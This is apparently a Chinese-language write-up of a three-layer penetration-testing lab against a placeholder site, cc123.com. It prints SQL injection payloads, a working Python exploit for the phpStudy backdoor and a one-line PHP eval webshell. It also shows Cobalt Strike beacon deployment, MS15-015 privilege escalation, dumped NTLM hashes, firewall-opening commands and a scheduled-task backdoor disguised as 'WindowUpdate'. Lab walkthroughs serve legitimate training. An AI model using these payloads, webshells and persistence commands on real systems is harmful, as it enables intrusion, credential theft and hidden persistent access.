第一层

一、信息收集

测试站点：www.cc.123.com

1、domian

使用工具暴力枚举子域名

www.cc.123.com
ww2.cc123.com
new.cc123.com

2、IP_Prot

使用rustscan扫描端口

Open 192.168.0.134:21                -- ftp
Open 192.168.0.134:53                
Open 192.168.0.134:80                -- iis
Open 192.168.0.134:135                
Open 192.168.0.134:999                -- phpmyadmin
Open 192.168.0.134:3389                -- rdp
Open 192.168.0.134:6588                -- hws
Open 192.168.0.134:49155            
Open 192.168.0.134:49156

二、漏洞测试

1、ww2.cc123.com

根据awvs扫描结果发现管理员登录页面

1、SQL注入-1

Sqlmap一把梭发现管理员登录页面存在sql注入

---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUJMzMyMjA3OTM4ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xqZOLn0fzcRfu7EbEDKHoyvx3obU94MS6VAUneBJOkZ0=&__VIEWSTATEGENERATOR=82312306&__EVENTVALIDATION=/wEdAAc5ZYESCKH66fJHGLAe4TLCKhoCyVdJtLIis5AgYZ/RYe4sciJO3Hoc68xTFtZGQEgOC/FhCJvlJJDlu9nTwjvq6ZACrx5RZnllKSerU+IuKh2nXP6dhZn6mKtmTGNHd3MtizSQ3FDPz4jhBkvaNoE1AM2SGgwYOgU2pIFlxhELWg1KHCIX5swqFeVF8xxNL/g=&username=admin';WAITFOR DELAY '0:0:5'--&password=123456&safecode=t80p&ImageButton1.x=32&ImageButton1.y=13&TextBox2=
---

尝试利用SQL注入漏洞绕过管理员登录

成功进入后台

2、SQL注入-2

进入管理员后台后Xray扫描到的第一个注入点，资讯列表功能

[Vuln: sqldet]
Target           "http://ww2.cc123.com/admin/aboutlist.aspx?pid=6"
VulnType         "error-based/default"
Payload          "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1157827142')))"
Position         "query"
ParamKey         "pid"
ParamValue       "convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1157827142')))"
type             "heuristic"
title            "convert function error based case"

3、SQL注入-3

进入管理员后台后Xray扫描到的第二个注入点，编辑资讯功能

[Vuln: sqldet]
Target           "http://ww2.cc123.com/admin/newsadd.aspx?id=539&pid=45"
VulnType         "blind-based/default"
Payload          "539/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/"
Position         "query"
ParamKey         "id"
ParamValue       "539/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/"
std_dev          "25"
sleep_time       "2000"
p_time           "7"
n_time           "2007"
stat             "{\"normal\":{\"samples\":[8,13,22,82,29,8],\"avg\":27,\"std_dev\":25.729360660537214,\"sleep_time\":2},\"sleep_0_time\":7,\"quick_check\":{\"samples\":[2007],\"sleep\":2},\"verify\":{\"samples\":[3009,3004,3011],\"sleep\":3}}"
title            "Generic SQL Server time based case [number]"
type             "time_based"
avg_time         "27

5、物理路径泄露

在网站基本信息设置功能上传图片的时候报错

## C:\\HwsHostMaster\\wwwroot\\ww2cc123\_55m39g\\web\\admin\\UpImg\\20210527064605.gif

6、SQLmap跑出的网络配置

command standard output:
---
Windows IP 配置
以太网适配器 本地连接 2:
   连接特定的 DNS 后缀 . . . . . . . :
   IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : localdomain
   本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
   IPv4 地址 . . . . . . . . . . . . : 10.10.10.136
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 
---

根据IP信息判断，这台主机不是主站(www.cc123.com )的主机，使用库站分离的结构且不出网

2、new.cc123.com

根据目录扫描结果发现这个cms是dedecms

管理页面：http://new.cc123.com/dede/
用户页面：http://new.cc123.com/member/
查看当前网站版本是否存在历史漏洞

http://new.cc123.com/data/admin/ver.txt
> 20150618

1、SQL注入

使用月师傅给的Exp攻击
最后跑出管理员密码为admin7788

2、写入一句话

上传成功但无法执行命令

上传大马以及可写目录检测

3、CS上线

新建监听器

生成木马

根据啊D小工具扫描出可写可执行目录，上传木马到该目录

c:\windows\debug\WIA\

使用大马执行木马

成功上线

4、查看系统信息

主机名:           WIN-KALKEMT3JMA
OS 名称:          Microsoft Windows Web Server 2008 R2 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00500-001-0000635-84364
初始安装日期:     2020/4/16, 19:46:53
系统启动时间:     2020/4/19, 17:51:31
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
                  [02]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3408 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   815 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   2,431 MB
虚拟内存: 使用中: 1,664 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 1 个修补程序。
                  [01]: KB976902
网卡:             安装了 2 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.0.134
                        [02]: fe80::c1e2:d216:9dad:969b
                  [02]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接 2
                      启用 DHCP:   否
                      IP 地址
                        [01]: 10.10.10.135
                        [02]: fe80::2c1c:e958:d8c2:1189

发现就打了一个补丁 [01]: KB976902

4、使用MS15-015提权

MS15-015 　[KB3031432]　　[Kernel Driver]　　(Win7/8/8.1/2012/RT/2012 R2/2008 R2)
https://github.com/SecWiki/windows-kernel-exploits

成功提权

三、据点占领

1、使用SMB协议进行移动

新建一个SMB监听器

选中system用户的会话并点击添加会话选中B_SMB

2、进程迁移

选择会话-> 进程列表 -> 选择一个进程(如果是管理员会话记得选中是管理员权限运行的程序) -> 选中中转监听器 -> 点击注入(inject)

2、哈希获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accb:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::

3、持久化后门植入

将后门修改名字为一个和系统程序差不多的程序名然后上传（忽略我的Lv_1）



使用计划任务植入后门

shell schtasks /create /tn "WindowUpdate" /tr "C:\Windows\SysWOW64\inetsrv\Lv1_WindowUpdate.exe" /ru SYSTEM /sc onstart
shell schtasks /run /tn WindowUpdate
shell schtasks /query /tn WindowUpdate       //若是查询失败则要修改字符集 chcp 437
shell schtasks /delete /tn WindowUpdate /F     // 删除

计划任务木马成功上线

第二层

一、信息收集

使用CS自带的端口扫描工具扫描发现这个网段还存在另一台主机

(ARP) Target '10.10.10.135' is alive. 00-0C-29-84-A4-05
(ARP) Target '10.10.10.134' is alive. 00-0C-29-87-89-82

仔细一看发现是第一层ww2.cc123.com连接的数据库服务器

二、漏洞利用

尝试寻找ww2cc123中的数据库连接语句，在ww2的网站根目录中的web.conifg中的数据库连接字符串（.net/asp网站的数据库配置文件都喜欢叫web.Config）

C:\HwsHostMaster\wwwroot\ww2cc123_55m39g\web\web.Config

打开发现连接字符串

server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123..

使用大马连接新建第二层CS转发器

生成第二层CS木马

查看当前大马权限

发现是系统权限了，那就随便写到一个目录吧

使用大马执行CS木马

执行后发现进程执行了但是没有返回会话，突然想到是不是web服务器启用了防火墙
查询防火墙状态

shell netsh firewall show state

使用命令放行转发器的端口

netsh firewall set portopening TCP 23111 ENABLE

再次运行木马成功上线

三、据点占领

1、哈希获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

2、持久化后门植入

目前还不知道怎么在第二层网络植入后门，待填坑

第三层

一、信息收集

使用CS自带端口扫描发现新主机，且开放了80端口

[+] received output:
(ARP) Target '10.10.1.128' is alive. 00-0C-29-87-89-8C
(ARP) Target '10.10.1.129' is alive. 00-0C-29-99-E2-1D
[+] received output:
10.10.1.129:80

使用第二层会话开启socks代理进行网页访问

使用浏览器插件设置浏览器代理访问网站

或者使用SocksCap

访问网站后发现这台主机装了一个phpstudy2014

二、漏洞利用

1、上传一句话

从月师傅那里得知phpstudy以前是存在后门的
可以根据网上的一篇复现文章进行漏洞利用：https://blog.csdn.net/qq_38484285/article/details/101381883

先使用代理工具代理cmd到同一个网络

#conding:utf-8
import requests
import sys
import base64
shell = "system('"+sys.argv[1]+"');"
shell_base64 = base64.b64encode(shell.encode('utf-8'))
header={'Accept-charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
def exploit(url):
    html = requests.get(url=url,headers=header).text
    return html
url = "http://10.10.1.129/"
exploit(url)

使用月师傅给的exp写入一句话

python3 phpstudy.py "echo ^<?php @eval($_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"

设置蚁剑代理

使用蚁剑连接

查看权限，已经是系统权限所以免去了提权的操作

2、上传CS木马

添加CS第三层转发器

生成木马

上传并执行

成功上线

三、据点占领

1、哈希获取

Administrator:500:aad3b435b51404eeaad3b435b51404ee:15132c3d36a7e5d7905e02b478979046:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

攻击拓扑